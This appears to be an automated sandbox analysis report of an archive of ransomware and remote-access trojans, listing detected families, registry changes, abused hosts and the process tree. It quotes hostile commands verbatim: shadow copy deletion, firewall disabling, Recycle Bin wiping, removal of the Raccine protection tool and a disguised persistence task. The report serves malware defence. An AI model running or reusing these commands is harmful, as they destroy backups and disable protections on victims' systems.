Analysis Overview
SHA256
535956c43830655c6fa5bfd37c66ee1e46343533ebe43e7ae1818805b7270c06
Threat Level: Known bad
The file RNSM00460.7z was found to be: Known bad.
Malicious Activity Summary
Detect MafiaWare666 ransomware
RedLine
Quasar RAT
Conti Ransomware
Raccoon
njRAT/Bladabindi
SectopRAT
NullMixer
CyberGate, Rebhip
Raccoon Stealer V1 payload
Disables service(s)
MafiaWare666 Ransomware
Modifies WinLogon for persistence
BitRAT
NanoCore
Quasar payload
Crylock
RedLine payload
SectopRAT payload
Deletes shadow copies
Detected Nirsoft tools
Disables Task Manager via registry modification
Modifies Windows Firewall
Checks computer location settings
ASPack v2.12-2.42
Modifies file permissions
Reads user/profile data of web browsers
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
UPX packed file
Sets desktop wallpaper using registry
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Views/modifies file attributes
Checks SCSI registry key(s)
Modifies registry key
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-08 20:19
Signatures
Analysis: behavioral1
Detonation Overview
| Submitted | Reported | Platform | Max time kernel | Max time network |
| 2024-10-08 20:19 | 2024-10-08 20:21 | win10v2004-20241007-en | 144s | 150s |
Command Line
Signatures
BitRAT
Conti Ransomware
Crylock
CyberGate, Rebhip
Detect MafiaWare666 ransomware
Disables service(s)
MafiaWare666 Ransomware
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe | N/A |
NanoCore
NullMixer
Quasar RAT
Quasar payload
Raccoon
Raccoon Stealer V1 payload
RedLine
RedLine payload
SectopRAT
SectopRAT payload
njRAT/Bladabindi
Deletes shadow copies
Detected Nirsoft tools
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ASPack v2.12-2.42
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NR = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe\"" | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 8c881c2cfea9.ngrok.io | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | 8.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper | C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe | N/A |
UPX packed file
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00460.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00460.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe"
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
C:\Users\Admin\AppData\Local\Temp\RSW.exe
"C:\Users\Admin\AppData\Local\Temp\RSW.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /cnetsh firewall set opmode disable
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /cwscript.exe t.vbs preventchangedesktop.bat
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\desktop.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\task.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windowdefender.vbs"
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" user32.dll,UpdatePerUserSystemParameters
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\wscript.exe
wscript.exe t.vbs preventchangedesktop.bat
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\preventchangedesktop.bat" "
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{438E72CA-0AD1-4205-B4AB-45C1B61F2279}'" delete
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{438E72CA-0AD1-4205-B4AB-45C1B61F2279}'" delete
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\system32\reg.exe
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2316 -ip 2316
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 692
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-9862ba6b06253fd9343c9311bb00e28e97e86d426e6ccc83277f587e19517cd3.exe
HEUR-Trojan-Ransom.Win32.Generic-9862ba6b06253fd9343c9311bb00e28e97e86d426e6ccc83277f587e19517cd3.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-ac8e713b699fd019b67cbaca58cc35738e05b3308c5abda28656a3097cb4c672.exe
HEUR-Trojan-Ransom.Win32.Generic-ac8e713b699fd019b67cbaca58cc35738e05b3308c5abda28656a3097cb4c672.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\appdata\local\temp\svcgef.exe
"C:\Users\Admin\appdata\local\temp\svcgef.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "ping 0.0.0.0&del "C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe""
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-de649dbbac2165042cdbd659466f8b8e726cc0d085bfd627e564a440319efdea.exe
HEUR-Trojan-Ransom.Win32.Generic-de649dbbac2165042cdbd659466f8b8e726cc0d085bfd627e564a440319efdea.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-c64807b99c0f69113c15fbdbb6c52880c5c1df614eca08280ad294485bcf36d7.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-c64807b99c0f69113c15fbdbb6c52880c5c1df614eca08280ad294485bcf36d7.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\install\MicroDate.exe
"C:\Windows\install\MicroDate.exe"
C:\Windows\SysWOW64\PING.EXE
ping 0.0.0.0
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS49532F59\setup_install.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_8.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5564 -ip 5564
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 484
C:\Users\Admin\AppData\Local\Temp\discord.exe
"C:\Users\Admin\AppData\Local\Temp\discord.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\install\MicroDate.exe
C:\Windows\install\MicroDate.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_1.exe
arnatic_1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_3.exe
arnatic_3.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_2.exe
arnatic_2.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_5.exe
arnatic_5.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_6.exe
arnatic_6.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5976 -ip 5976
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windowsdefendertask" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-057c923e5566490537ba9a97d880cdfab172c3c329102a4e1955d17a13349f50.exe
HEUR-Trojan.MSIL.Crypt.gen-057c923e5566490537ba9a97d880cdfab172c3c329102a4e1955d17a13349f50.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_4.exe
arnatic_4.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_8.exe
arnatic_8.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 668
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6420 -ip 6420
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 380
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
